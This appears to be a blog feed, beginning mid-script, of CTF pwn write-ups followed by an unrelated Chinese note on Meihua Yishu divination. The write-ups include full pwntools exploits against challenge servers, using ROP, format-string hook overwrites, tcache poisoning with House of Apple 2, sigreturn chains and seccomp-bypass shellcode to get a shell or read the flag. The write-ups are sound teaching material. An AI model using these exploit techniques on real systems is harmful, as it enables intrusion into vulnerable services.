        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    payload = flat(
        {
            0x28: elf.plt["gets"],
            0x30: elf.plt["gets"],
            0x38: elf.plt["puts"],
            0x40: elf.sym["main"],
        },
        filler=b"\x00",
    )
    target.sendlineafter(b"Enter your url to fetch", payload)

    payload = flat(
        p32(0x0),  # lock
        b"A" * 0x4,  # cnt
    )
    target.sendline(payload)
    target.sendline(b"BBBB")

    target.recvline()
    tls = u64(target.recvline().strip()[8:].ljust(0x8, b"\x00"))
    libc.address = tls + 0x28C0
    target.success(f"tls: {hex(tls)}")
    target.success(f"libc: {hex(libc.address)}")

    payload = flat(
        {
            0x28: libc.address + rop.find_gadget(["pop rdi", "ret"])[0],
            0x30: next(libc.search(b"/bin/sh")),
            0x38: libc.address + rop.find_gadget(["ret"])[0],
            0x40: libc.sym["system"],
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.sendlineafter(b"Enter your url to fetch", payload)

    target.interactive()


if __name__ == "__main__":
    main()

New Age

Information

Category: Pwn

Description

They said a carefully crafted seccomp filter would always save you, can you make sure for me?

Write-up

flag name is random, openat2 is not disabled.

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    asm,
    context,
    flat,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./new_age"
HOST, PORT = "159.89.106.147", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=False)


def main():
    launch()

    sc = asm("""
        /* openat2(".", {0,0,0}, 24) */
        push 0
        push 0
        push 0
        mov rdx, rsp
        push 0x2e
        mov rsi, rsp
        mov rdi, -100
        mov r10, 24
        mov rax, 437
        syscall

        /* getdents64(fd, buf, 0x1000) */
        mov rdi, rax
        sub rsp, 0x1000
        mov rsi, rsp
        mov rdx, 0x1000
        mov rax, 217
        syscall

        /* iterate directory, skip `.` (0x2e) and `..` (0x2e2e) */
        mov r8, rax     /* total length */
        mov r9, rsp     /* buffer pointer */
    find_real_file:
        movzx eax, byte ptr [r9+19]
        cmp al, 0x2e    /* if the first character of the file name is `.`, skip it */
        je next_ent

        /* find the file, store in `r9+19` */
        jmp open_it

    next_ent:
        movzx ax, word ptr [r9+16] /* d_reclen */
        add r9, rax
        sub r8, rax
        jg find_real_file
        jmp exit

    open_it:
        /* openat2(AT_FDCWD, r9+19, {0,0,0}, 24) */
        lea rsi, [r9+19]
        mov rdi, -100
        lea rdx, [rsp+0x1000+8]
        mov r10, 24
        mov rax, 437
        syscall

        /* pread64(fd, buf, 0x100, 0) */
        mov rdi, rax
        mov rsi, r9
        mov rdx, 0x100
        xor r10, r10
        mov rax, 17
        syscall
        mov r12, rax

        /* writev(1, &iovec, 1) */
        push r12
        push r9
        mov rsi, rsp
        mov rdi, 1
        mov rdx, 1
        mov rax, 20
        syscall

    exit:
        mov rax, 60
        syscall
    """)

    target.sendafter(b"Send shellcode (max 4096 bytes): ", sc)
    target.interactive()


if __name__ == "__main__":
    main()

Zoro’s Blind Path

Information

Category: Pwn

Description

The only way forward is understanding what cannot be seen

Write-up

This chall disabled X x P p S s and $ character.

The idea is using the %c to iterate printf arguments, so the next %n will write to the address which we pre-putted in the stack.

And since we have only have 10 bytes for the second format string, we cannot use the second format string to modify address. But the libc version is 2.23, so there exists __malloc_hook and __free_hook, which in libc's rw region.

Recall printf will malloc a larger buffer if the output content exceeds the default buffer size, so we can overwrite a hook to onegadget address and then trigger it by %1000000c in the second printf.

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    fmtstr_payload,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./app_patched"
HOST, PORT = "challenges.ctf.sd", 33898

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def build_fmt_payload(target_addr, value, consume=24, offset=0x90, num_bytes=6):
    target_vals = [(value >> (i * 0x8)) & 0xFF for i in range(num_bytes)]

    specs = []
    # consume arguments
    for _ in range(consume):
        specs.append(b"%c")
    curr = 24  # 19

    for i in range(num_bytes):
        # consume (arg 26, 28, 30, 32, 34, 36)
        diff = (target_vals[i] - curr % 256 + 256) % 256
        if diff == 0:
            specs.append(b"%256c")
            curr += 256
        else:
            specs.append(f"%{diff}c".encode())
            curr += diff
        # consume (arg 27, 29, 31, 33, 35, 37)
        specs.append(b"%hhn")

    fmt = b"".join(specs)

    # if length over offset, then we have to put addresses farther
    if len(fmt) > offset:
        raise ValueError(f"Format string too long: {len(fmt)} bytes")

    payload = fmt.ljust(offset, b"\x00")
    for i in range(num_bytes):
        payload += flat(target_addr + i)
        payload += flat(0xCAFEBABE)

    return payload


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"Clue: ")
    libc.address = int(target.recvline(), 16) - libc.sym["_IO_2_1_stdout_"]
    __malloc_hook = libc.sym["__malloc_hook"]
    one_gadget = libc.address + 0x4527A

    target.success(f"libc: {hex(libc.address)}")
    target.success(f"__malloc_hook: {hex(__malloc_hook)}")
    target.success(f"one_gadget: {hex(one_gadget)}")

    # arg 9 is the start of our payload
    # target address at offset 0x90 -> arg (9 + 0x90/8) = arg 27
    # payload = build_fmt_payload(__malloc_hook, one_gadget)
    payload = fmtstr_payload(8, {__malloc_hook: one_gadget}, no_dollars=True)

    raw_input("DEBUG")
    target.sendline(payload)

    target.sendline(b"%1000000c")
    target.interactive()


if __name__ == "__main__":
    main()

Wyv3rn's Magic

Information

Category: Pwn

Description

We missed the legend !

Write-up

Haven't solve this.

This might be useful: https://arxiv.org/pdf/2304.07940

Exploit

TODO

House Of Pain

Information

Category: Pwn

Description

This house is welcoming. The journey, however, can be painful.

Write-up

We can leak stack address in small_message, and its just a CHOP bypass canary.

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
    u64,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./chall_patched"
HOST, PORT = "challenges4.ctf.sd", 34724

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=False)


def small_message(size, msg):
    target.sendlineafter(b"2. Exit\n", str(1).encode())
    target.sendlineafter(b"Enter size: ", str(size).encode())
    target.sendafter(b"Enter your message: ", msg)


def main():
    launch()

    small_message(0x20, b"A" * 0x18)

    target.recvuntil(b"A" * 0x18)
    stack = u64(target.recvline().strip().ljust(0x8, b"\x00"))
    target.success(hex(stack))

    win = 0x401773
    fake = flat(
        {
            0x0: stack,
            0x8: 0x40168F,
            0x20: stack - 0x118 + 0x18,
            0x28: 0x4013C8,  # 0x4013c8 (main+82)
            0x58: win,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    small_message(0x10, b"A" * 0x30 + fake)
    target.sendlineafter(b"2. Exit\n", str(2).encode())

    target.interactive()


if __name__ == "__main__":
    main()

Alice

Information

Category: Pwn

Description

Alice, struggling with the traumatic death of her family, returns to a corrupted Wonderland to unlock repressed memories. Can you help her remember who she is ?

Write-up

This chall limited our free counts, so we cannot just fill tcache and then get the chunk into unsortedbin to leak libc.

The idea is tcache poisoning to let malloc return tcache_perthread_structure, and change the correspond tcachebin's counts to 7, so the next free will go to unsortedbin.

Then we can do a ez House of Apple 2 attack to get shell.

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    FileStructure,
    context,
    flat,
    process,
    raw_input,
    remote,
    u64,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./vuln_patched"
HOST, PORT = "159.89.105.235", 10001

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=False)


def create_memory(idx, size, data):
    target.sendlineafter(b"> ", str(1).encode())
    target.sendlineafter(b"Memory index: ", str(idx).encode())
    target.sendlineafter(b"How vivid is this memory? ", str(size).encode())
    target.sendlineafter(b"What do you remember? ", data)


def edit_memory(idx, data):
    target.sendlineafter(b"> ", str(2).encode())
    target.sendlineafter(b"Which memory will you rewrite? ", str(idx).encode())
    target.sendlineafter(b"Rewrite your memory: ", data)


def view_memory(idx):
    target.sendlineafter(b"> ", str(3).encode())
    target.sendlineafter(b"Which memory do you wish to recall? ", str(idx).encode())


def forget_memory(idx):
    target.sendlineafter(b"> ", str(4).encode())
    target.sendlineafter(b"Which memory will you erase? ", str(idx).encode())


def main():
    launch()

    create_memory(0, 0x10, b"0")
    create_memory(1, 0x10, b"1")
    forget_memory(0)
    forget_memory(1)
    view_memory(0)
    heap = u64(target.recvline().strip().ljust(0x8, b"\x00")) << 12
    pos = heap >> 12
    target.success(f"heap: {hex(heap)}")

    edit_memory(1, flat(mangle(pos, heap + 0x60)) + b"A" * 0x8)
    create_memory(2, 0x10, b"A" * 0x8)
    create_memory(3, 0x2F0, b"unsortedbin")
    create_memory(5, 0x250, b"guard")
    create_memory(4, 0x10, flat(0) + flat(0x0000000700000000))  # 0x300 [  7]
    forget_memory(3)
    view_memory(3)
    libc.address = u64(target.recvline().rstrip().ljust(0x8, b"\x00")) - 0x203B20
    target.success(f"libc: {hex(libc.address)}")

    create_memory(6, 0x250, b"A" * 0x8)
    forget_memory(6)
    forget_memory(5)

    edit_memory(5, flat(mangle(pos, libc.sym["_IO_list_all"])) + b"A" * 0x8)

    fp_addr = heap + 0x5E0
    system = libc.sym["system"]
    fp = FileStructure(null=libc.sym["lock"])
    fp.flags = b" sh"
    fp._IO_write_ptr = 1
    fp._IO_write_base = 0
    fp._wide_data = fp_addr
    fp.vtable = libc.sym["_IO_wfile_jumps"]
    fp.chain = system
    payload = bytes(fp) + flat(fp_addr)

    raw_input("DEBUG")
    create_memory(7, 0x250, payload)
    create_memory(8, 0x250, flat(fp_addr))

    target.sendlineafter(b"> ", str(5).encode())

    target.interactive()


if __name__ == "__main__":
    main()

此地不宜调试

Mon, 19 Jan 2026 00:00:00 GMT

import GithubCard from "@components/misc/GithubCard.astro";

Challenge Collections

You can download the challenges from my repo above.

stack/level-0

Information

Category: Pwn

Description

None.

Write-up

This is probably the easiest stack fengshui challenge.

This challenge gave us pop rax; ret gadget, but cannot control any other registers, like rdi etc.

Only 0x20 bytes read with 0x10 bytes buffer, so we can only write 0x10 bytes data each time, and then overwrite rbp and rip.

So, the idea is use sigreturn to execute execve("/bin/sh", NULL, NULL), and the first thing we have to do it figure out how to implement the arbitrary size read, such that we can send the full sigreturn structure, then construct a sigreturn by utilize the pop rax; ret gadget.

The memory layout should be looks like:

# pop rax; ret
# 0xf
# syscall
# sigreturn frame

Now, let's think about how to achieve an arbitrary size read. Assume following memory dump is the stats of the first time read, because we want get an arbitrary size consistent read, so we cannot chain the next read gadget write to 0x404038 directly.

pwndbg> x/10gx 0x404028
0x404028: 0x4141414141414141 0x4141414141414141
0x404038: 0x0000000000404048 0x0000000000401133
0x404048: 0x0000000000000000 0x0000000000000000
0x404058: 0x0000000000000000 0x0000000000000000
0x404068: 0x0000000000000000 0x0000000000000000

If we directly write to the next consistent address, it'll cause read return to 0x4242424242424242 and crash the program.

pwndbg> x/10gx 0x404028
0x404028: 0x4141414141414141 0x4141414141414141
0x404038: 0x4242424242424242 0x4242424242424242
0x404048: 0x0000000000404058 0x0000000000401133
0x404058: 0x0000000000000000 0x0000000000000000
0x404068: 0x0000000000000000 0x0000000000000000

The way to bypass is fairly simple, just avoid corrupt the return address later used by read. First, we read some junk bytes to 0x404048 to keeping the rop chain alive so we can read more data.

pwndbg> x/10gx 0x404028
0x404028: 0x4141414141414141 0x4141414141414141
0x404038: 0x0000000000404058 0x0000000000401149
0x404048: 0x5858585858585858 0x5858585858585858
0x404058: 0x0000000000404048 0x0000000000401133
0x404068: 0x0000000000000000 0x0000000000000000

Then write the actual data which we needed to 0x404038.

pwndbg> x/10gx 0x404028
0x404028: 0x4141414141414141 0x4141414141414141
0x404038: 0x4242424242424242 0x4242424242424242
0x404048: 0x0000000000404048 0x0000000000401133
0x404058: 0x0000000000404048 0x0000000000401149
0x404068: 0x0000000000000000 0x0000000000000000

Finally, repeat the same way to achieve arbitrary size read.

As for how to get the syscall; ret gadget, we can utilize read@got, checking instructions nearby read, you can found some of them.

So the final memory layout should be:

# pop rax; ret
# 0xf
# read@plt (syscall)
# sigreturn frame

And the final strategy is:

Pre-place pop rax; ret chain for execute sigreturn
Place sigreturn frame beside the chain (actually you can put it anywhere, just have to manually pivot, to make sure the rsp points to the frame)
Modify read@got points to syscall; ret gadget
Pivot back to the start of the ROP chain

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    SigreturnFrame,
    constants,
    context,
    flat,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./chall_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def arbitrary_size_read(target, frame, size, read_addr, base_addr):
    for i in range(0, size, 0x10):
        offset = (i // 0x10) * 0x10

        payload1 = flat(
            {
                0x0: b"X" * 0x10,
                0x10: (base_addr + offset) + 0x10,
                0x18: read_addr,
            },
            filler=b"\x00",
        )
        target.send(payload1)

        chunk = frame[i : i + 0x10]
        if len(chunk) < 0x10:
            chunk = chunk.ljust(0x10, b"\x00")

        payload2 = flat(
            {
                0x0: chunk,
                0x10: (base_addr + 0x20 + offset) + 0x10,
                0x18: read_addr,
            },
            filler=b"\x00",
        )
        target.send(payload2)


def main():
    launch()

    read = elf.sym["main"] + 0x8
    pop_rax_ret = 0x401126
    ret = pop_rax_ret + 0x1

    payload = flat(
        {
            0x10: 0x404038 + 0x10,
            0x18: read,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    payload = flat(
        {
            0x0: elf.sym["main"],
            0x10: 0x404018 + 0x10,
            0x18: read,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    payload = flat(
        {
            0x0: pop_rax_ret,
            0x18: ret,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    payload = flat(
        {
            0x0: read,
            0x10: elf.bss() + 0x500 + 0x10,
            0x18: read,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    payload = flat(
        {
            0x0: b"/bin/sh\x00",
            0x10: 0x404020 + 0x10,
            0x18: read,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    payload = flat(
        {
            0x0: 0xF,
            0x8: elf.plt["read"],
            0x10: elf.bss() + 0x300,  # junk
            0x18: read,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    frame = SigreturnFrame()
    frame.rax = constants.SYS_execve
    frame.rdi = elf.bss() + 0x500
    frame.rsi = 0
    frame.rdx = 0
    frame.rsp = 0x404030
    frame.rip = elf.plt["read"]
    frame = bytes(frame)

    target.hexdump(frame)
    target.success(f"frame len: {hex(len(frame))}")

    arbitrary_size_read(target, frame, len(frame), read, 0x404030)

    payload = flat(
        {
            0x10: elf.bss() + 0x800,
            0x18: read,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)

    payload = flat(
        {
            0x10: elf.got["read"] + 0x10,
            0x18: read,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.send(payload)
    raw_input("DEBUG")
    target.send(b"\xdb")

    target.interactive()


if __name__ == "__main__":
    main()

梅花易数札记

Sun, 18 Jan 2026 00:00:00 GMT

前言

我宣布，源神是真神，带我学 pwn 带我占（

诸如术数一类，其实很早就想学了，但是苦于没时间，没资源，反正就是自己不知道怎么学。但是现在有高手带，那还用说，赶紧跟着学啊！哈哈哈哈。

序论

命理与天命

命理是唐朝李虚中所提出的，通过阴阳五行、甲子纳音、生克制化等理论，预测一个人的人生走向。而天命却出自于<i>《中庸》</i>中「天命之谓性」，是在解释一个人与生俱来的性情，与其人生归宿之间的关系。

而孔子所说的「五十而知天命」，并非是他在五十岁时通晓了命理，而是说他知晓了人生的归宿，实现了现实于自我的和解。

何为「心」

今天研究<i>《梅花易数》</i>的学者往往会把「心」解读为人的意识，认为人的意识可以替代卜筮的作用，继而追求一种灵感之学。实际上并非如此，如在<i>《黄帝内经》</i>中给出的解释「所以任物者谓之心」，任物就是感受，能够感受感知外物的存在称之为「心」。

那么在我们感受外物时，并不是因为我们先想要产生感受，才会触发感受。而是先产生了感受，才会意识到感受的存在。所以心是相较于意识来说更为底层的存在。如果我们刻意而求，那么意识就会干扰我们的感知，此刻所谓的灵感更多是意识层面的妄想而已。

占卜准确的要点

「神无体而易无方」——《易经》

就易本身而言是没有完全既定的法度的。所以当我们确定法度时，心中所树立起来的标尺，就会通过卦象的形势给与垂示，关键在于心有主定。

深入学习，应该让占卜的方法变得有据可循，有理法可以分判。理法即心法，理法存在的意义，主要在于内心的坚定和对自然的契合。而在与自然的契合上，则是表现在理法的合理与否。例如我们需要考虑，<strong>所使用的方法是否能够将问题全面的呈现出现，会不会出现我们把假定作为客观事实来论？</strong>占卜要学会分判已知与未知，确保哪些是当下可以确定的条件，哪些是不确定的问题，<strong>保证绝对的契合自然的走向，减少人为思想的干预。</strong>

学习卜筮，技法是其次，关键在于思考我们心体的妙用，以及卦局的语言。

八卦象例

乾三连☰ 坤六断☷ 震仰盂☳ 艮覆碗☶<br /> 离中虚☲ 坎中满☵ 兑上缺☱ 巽下断☴<br /> ——朱熹，《周易本义》

上面的八卦取象歌诀展示了八卦的基本形象，既可以作为初学者快速记忆的口诀，也可以作为我们取象的一定依据。关于类象的注解，后面再一起写，这里只要先记住名字和与之对应的卦象即可。

周易卦数

下面这个伏羲八卦次序图就没什么好看的了，因为我上面画的那张图已经总结好了 :D

我主要是把这张图里面的先天八卦数搬过去了，口诀是：乾一，兑二，离三，震四，巽五，坎六，艮七，坤八。

:::important 以后起先天卦就要用到这些先天数，所以，这些一定要要捻熟于心。 :::

btw, 太阴太阳也叫做老阴老阳，相对的有少阴少阳。

但是，如何将伏羲八卦次序图中的四象和我画的图中的四象对上呢？这里其实还挺有意思的，简单写一下。

假设我们现在定义，这两个阳爻构成了，「天」、「地」，我们称中间这块区域叫做「人」，但这只不过是为了给它个名字罢了，人生于天地之间嘛，这里可以简单理解为天地之间的万物：

首先是太阳，顾名思义，它一定是致阳的，故两个阳爻构成的就是太阳；那相对的，太阴为致阴，故两个阴爻构成的就是太阴。

用图来说的话，就是这样，天地之间全是阳即为太阳，全是阴即为太阴：

如果这里用阳气和阴气来比喻的话，或许更好理解，然后就可以把「人」这部分看作是「空中」。

此时，下面这张图就很好理解了，即阴气刚刚从地底冒出来，也就是阴气初生。既然说阴气出声，那天地间自然还是阳气居多，所以，我们取下面两个爻的话，对应的就是是少阳：

相对的，这个少阴也很好理解，也是阴气还没能完全侵蚀完整个天地之间的万物，所以下面这张图，取上面两个爻，对应的就是少阴：

八卦五行所属

乾兑金，坤艮土，震巽木，坎水，离火。

这个的话，我画的图里也总结了，按照 2、1、2、1、2 的顺序来排，其中，只有离卦和坎卦分别对应了火和水，这两卦只有一个五行，剩下的每个五行都对应两个卦。

五行生克

金生水，水生木，木生火，火生土，土生金。<br /> 金克木，木克土，土克水，水克火，火克金。

<strong>五行的行，为流行之意，因此五行说的是五种流行之气，是一种形而上的能量表述，而非某一种具体的物质。</strong>因为五行是一种概念，所以用事物去解释五行生克，便会出现牵强附会之处。

那么五行以及五行生克我们该如何理解呢？按照<i>《五行大义》</i>的说法，五行源自于阴阳之气的消长，阳涨阴消，阳气弱于阴气时为木，阳涨阴消，阳气盛于阴气时为火。阴涨阳消，阴气弱于阳气时为金，阴涨阳消，阴气盛于阳气时为水，阴阳中和之气为土，四季交接，行中和之道，故居中位金火之间。当然以上可以解释天干的五行次序，因为天干气，所以按一气之更迭论。而地支为质，土气于地则化形，寄生四季，故居辰戌丑未，散之四方。

春夏秋冬的四季变化所遵循的是五行相生的顺序，天有好生之德。因为有生的力量作为基础，事物才能生生不息的向前发展。而五行相隔一位就产生了克制的力量，是因为事物在过多的生力推促之后，便会产生克制的力量，即是<i>《黄帝阴符经》</i>中所说的：「恩生于害，害生于恩。」因为五行力量有生有克，所以一切能够在运动中稳定，变化中守恒。

下图顺时针方向箭头为生，内部的箭头指向为克。

五行生克在术数中是代表着一种发展趋势，或者是逻辑关系。如用卦生体卦，为当下之吉。代表当下的时间阶段，它是顺向发展的，代表着生力和推助力。用卦克体代表当下不吉，因为代表着逆向或者阻滞。<strong>但是也不可以简单的认为生就是吉利，克就是凶灾。</strong>如同人在悬崖之上，此时如若再推助一把，反倒为害，克制他反而是救了他的性命。<strong>所以生克虽然是我们判断吉凶的依据，却并不能够直接和吉凶画上等号。</strong>

<i>《梅花易数》</i>决定事物关系的是体用，体用就是运用阴阳动静之理，来定主客之象。主客、动静本身就已经锁定了范畴事类。因此<i>《梅花易数》</i>中所使用的五行生克，是更精准的对事类进行描述。

类象是建立在五行的基础上，五行又是建立在体用之上。如果作为电影来理解，象就是画面，五行则是背后的剧本，发展的剧情，体用则是切入的镜头。我们需要先确定镜头的切入角度，再推求背后的剧情，继而才是画面的推进。当然也不可一概而论，如在<i>《万物数 · 身命章》</i>中，也有根据五行来断六亲情况，这是因为身命作为断占，诸多信息无法在卦象中显示完全，方才有如此断法。

五行旺衰

:::important 我克者为妻财，克我者为官鬼，我生者为子孙，生我者为父母，比和者为兄弟。我即是我。

春、夏、秋、冬分别对应的五行是木、火、金、水，其中「土」长存于四季，每个季令的最后一个月的五行就是「土」。 :::

然后，只论能量强弱，不论层次排序的话，旺 > 相 > 休 > 囚 > 死。

其中，「旺」对应的是「我」，「我」自己对于「我」来说当然是最好的；「相」对应的是生我者，生我者一般来说总不会想着害你吧，只是一般来说；「休」对应的是我生者，之所以这个排在中间，我们可以想象，母亲生完孩子后还需要休养很长一段时间，所以相互抵消了损耗；「囚」对应的是我克者，我克者虽然是我掌控的，但我要想掌控的话得付出一些东西，并且，我肯定克不动季令的五行，季令的力量是很强大的，所以我要克它却还克不动，就陷入了困境，所以是「囚」；「死」对应的就是克我者，这个应该没啥不好理解的。

:::tip 如果当前季令是春（木），有两个木，但是有三个金，金依旧是克不动木的。但是依照先后天八卦图的卦位来看的话，当卦处于好的卦位时就会具备很强的影响，此时对季令会有一定克制作用。 :::

卦气旺衰

卦气旺：震巽木旺于春，离火旺于夏，乾兑金旺于秋，坎水旺于冬，坤艮土旺于辰戌丑未月。<br /> 卦气衰：春坤艮，夏乾兑，秋震巽，冬离，辰戌丑未坎。

旺本意为太阳日晕，旺就是旺盛，就是显著。衰为古代穿的麻质孝服，所以衰代表着死亡和衰弱。因此卦气的旺衰代表八卦在不同的时间上能量的强弱。而在具体的使用中又分有静态旺衰和动态旺衰。

静态的即是当下旺衰的状态。得令者为旺，如卦气旺断为贵器，也为官贵，这就是八卦旺衰的静态呈现。

动态的则是八卦随着时令变化，而产生的力量强弱，通常这种力量强弱会导致事件爆发。因此<i>《梅花易数》</i>以旺时为应期，因为卦旺则显著，显著就是表现了出来，也就是应期。克体之卦也是在克体之卦旺时为应期，因此代表着不好的事物表现了出来。

需要注意的是，气是依于卦在发挥作用的。卦象就如同草木，气则是节气。草木的变化是顺应节气变化的，但同样节气的变化也是体现在草木的变化之上，所以气是借着卦象去表现的。如果卦象有所悬示，则必然会发生卦象所垂示的事情。旺衰决定的是事物的动态发展，显隐变化。

那么为什么要以月令作为参考呢？因为万物的变化受到月份的影响最大，春生夏长秋收冬藏，万物在月令的作用下变化的最为显著，所以一般情况下以月令来作为旺衰的参考标准。卦气旺衰所依据的春夏秋冬四季，是以节气为标准，因为节气的确立是建立在万物的变化表征上的。因为地理所处于经纬度的不同，所以不同的国家，万物变化也是有差别。所以节气的确立，实际上是确立在中国的地理位置上的。故而旺衰以中国的节气来论，而不以国际的标准来看。比如在一些国家，节气变化不同于中国，一年之内没有四季变化，或于中国的季节是相反的，那么应期可能也不能按照我们现有的理论推算。起卦则不以此论，因为起卦仅仅是取数而已，所以公历阴历皆可，但是一般使用农历起卦。

下面为二十四节气对应的农历月份，可记可不记，因为现在的科技很发达（

